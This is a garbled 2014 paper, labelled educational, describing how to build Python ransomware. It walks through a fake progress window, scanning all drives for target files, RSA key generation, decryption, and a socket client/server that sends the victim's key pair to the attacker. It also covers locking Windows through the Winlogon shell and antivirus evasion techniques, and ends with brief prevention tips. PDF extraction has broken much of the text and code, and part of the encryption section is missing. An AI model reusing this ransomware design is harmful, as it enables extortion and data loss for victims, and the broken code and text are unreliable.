2. t
Youness Zougar (@L3tsXpl0it)
zougar92@gmail.com
October 30, 2014
In this paper, I will be explaining how Ransomware works by giving some
examples. This is done for Educational purposes only to understand better
how Ransomware behaves.
1 What is a Ransomware ?
Brie
y, Ransomware is a type of malware created in the aim to restrict
access to a victim's computer by encrypting
3. les on the hard drive. After
that, the victim is asked to pay the attacker to get the restriction removed by
decrypting the encrypted
4. les. CryptoLocker for example is a Ransomware
that infected more than 200K systems in the world, and generated millions
of dollars to its developer.
2 How does it work ?
The process is simple. Generally, when the Ransomware gets executed, it
scans in background all the directories on the system looking for interesting
5. les' extensions (.docx, .xlsx...) that were hard coded in it, then it en-
crypts them using an encryption key. Some Ransomwares block completely
the victims to access the system by changing the Winlogon shell value from
explorer.exe to the the path of the malware executable. At the end, the Ran-
somware pops-up a window asking the victim a ransom to get the decryption
key. To push the victim to pay as fast as possible, some Ransomwares cap-
ture webcam session and use it to freak out the victim.
Now, we have an idea how simple Ransomware works. Let's go deeper
into its functions.
1
6. 3 How Ransomware is made ?
3.1 Scenario
Let's think of a simple Ransomware scenario.
The victim will get the executable on his machine (torrent download, an
infected USB stick...) and launches it. A window will pop-up displaying a
loading bar asking the victim to wait.
In the meantime and in background, all the interesting
7. les will get en-
crypted with a generated unique RSA-2048 Public key.
Once the
8. les get encrypted, the generated RSA-2048 pair (Public and Pri-
vate keys) is sent to the attacker's server (if the victim is connected to the
Internet) or stored in the machine (if she isn't connected).
When the encryption of
10. nished, the loading window is closed and
a new window is launched, displaying a ransom message and the remaining
time to pay to get the decryption key.
To get the RSA-2048 Private key, the victim has to pay before time runs
out using the attacker's de
11. ned methods (Bitcoin, PaySafeGuard, UKash...).
Once the victim gets the Private key and enters it, the decryption process
is executed to get back the original
12. les.
3.2 Functions
The scenario can be translated in functions as shown below.
- Launch Loading Window : A fake loading bar is created to push the
user to wait until the encryption's process of the
14. nished.
Example:
import t tk
from Tkinter import
def fake loading window ( ) :
t = Tk( )
l a b e l = Message ( t , t ext= Pl eas e wai t . . . )
l a b e l . pack ( )
prog bar = t tk . Progr e s sbar ( o r i e n t=HORIZONTAL, l ength=500 , mode=' de t e rminat e ' )
t . t i t l e ( Encrypt ing f i l e s . . . )
prog bar . s t a r t ( )
t . mainloop ( )
2
19. les in the
current user's home folder.
Example:
import fnmatch
def g e t f i l e s ( ) :
matches = [ ]
volumes = [ ]
path = ABCDEFGHIJKLMNOPQRSTUVWXYZ
f i l e e x t = [ ]
for p in path :
i f os . path . e x i s t s (p+' : ' ) :
volumes . append (p)
volumes . append ( os . getenv ( 'USERPROFILE' ) )
for v in volumes :
i f v != 'C' :
for root , di r s , f i l e s in os . walk ( v ) :
for f in f i l e e x t :
for i in fnmatch . f i l t e r ( f i l e s , f ) :
matches . append ( os . path . j o i n ( root , i ) )
return matches
- Generate Keys : A function that generates an RSA-2048 Public/Pri-
vate keys.
Example:
from Crypto . Publ icKey import RSA
def g ene r a t e k e y s ( ) :
pr i v a t e = RSA. gene rat e (2048)
publ i c = pr i v a t e . publ i ckey ( )
pr i v a t e k e y = pr i v a t e . exportKey ( )
publ i c k e y = publ i c . exportKey ( )
return publ i c key , pr i v a t e k e y
- Encrypt Files : This function uses the Public key generated by the
Generate Keys' function and encrypts all the
20. les returned by the Get Files'
function, then it adds an extension to the encrypted
23. les using the
Private key entered by the victim in the entry of the ransom window.
Example:
def decrypt (message , pr ivkey ) :
de c ryptor = RSA. importKey ( pr ivkey )
decrypted = de c ryptor . decrypt (message )
return decrypted
- Send Private Key : If the victim is connected to the Internet, this
function sends the generated pair (Public/Private keys) to the server using
a secured connection (SSL). Else, this function stores the generated pair in
an obfuscated way somewhere in the victim's machine.
In 90% of the time, the generated pair in sent to the server because we
assume that the victim will directly execute the executable when it is down-
loaded. So an Internet connection is present.
Example (client):
import s o cke t
s = s o cke t . s o cke t ( s o cke t .AF INET, s o cke t .SOCK STREAM)
s . connect ( ( ' l o c a l h o s t ' , 1337) )
s s l S o c k e t = s o cke t . s s l ( s )
i f CN=TOTO in repr ( s s l S o c k e t . s e r v e r ( ) ) :
s s l S o c k e t . wr i t e ( ' He l lo s e cur e s o cke t nn ' )
print connected !
print s ending keys . . .
s . c l o s e ( )
Example (server):
import s o cke t
from OpenSSL import SSL
cont ext = SSL . Context (SSL .SSLv23 METHOD)
cont ext . u s e p r i v a t e k e y f i l e ( ' s e r v e r . key ' )
cont ext . u s e c e r t i f i c a t e f i l e ( ' s e r v e r . c r t ' )
s = s o cke t . s o cke t ( s o cke t .AF INET, s o cke t .SOCK STREAM)
s = SSL . Connection ( context , s )
s . bind ( ( ' 0 . 0 . 0 . 0 ' , 1337) )
s . l i s t e n ( 5 )
while True :
conn , addr = s . ac c ept ( )
print repr ( conn . r e cv ( 1 0 2 4 ) )
4
24. 3.3 What about Antivirus ?
The most used and targeted environment by malwares today is Windows.
So, we can't target this environment without thinking about Antivirus. Mal-
ware developers just need to get rid of them to make their malwares unde-
tectable when scanned.
Antivirus returns an analyzed executable in one of the following status :
- Detected :
The executable is detected because of a signature or malicious behavior. Or
it can also be detected as a false positive.
- Not detected :
The executable isn't detected because no blacklisted signature was found on
it, or its behavior isn't harmful. It can also use some techniques to bypass
Antivirus detection.
Malware developers are more interested in the second status. So, to make
an executable undetectable, they use some techniques to bypass Antivirus
detection. This can be done by creating a polymorphic code generator for
example. The generator will help to bypass signature based detections, as it
generates each time a totally dierent sample of the executable while keep-
ing its same behavior.
RunPE technique : A well known technique used by malware developers
to bypass behavioral detections.
Python programming : The code gets partly obfuscated when using
py2exe to create a Windows executable from a python source
25. le.
Some other techniques can be used to achieve the anti-detection process.
5
26. 4 How to prevent malware infection ?
Here are some basic advices to keep away malwares from your computer.
- Keep your Antivirus updated
Yes, today the malware isn't detected because of a bypass technique. But
what about tomorrow ?
- Be aware of what you are executing on your machine
Don't trust the downloaded
27. les using torrents for example, as it is one of
the favorite ways for malware developers to spread malwares.
5 Conclusion
Nowadays, people should be aware about the existence of this type of mal-
ware and what they can do. Moreover, they must protect and secure their
computers to stay safe from any compromise of their systems or personal
sensitive information. However, Antivirus companies need some new meth-
ods and ways to quickly detect and destroy sophisticated malwares before
they spread rapidly across the Internet.
6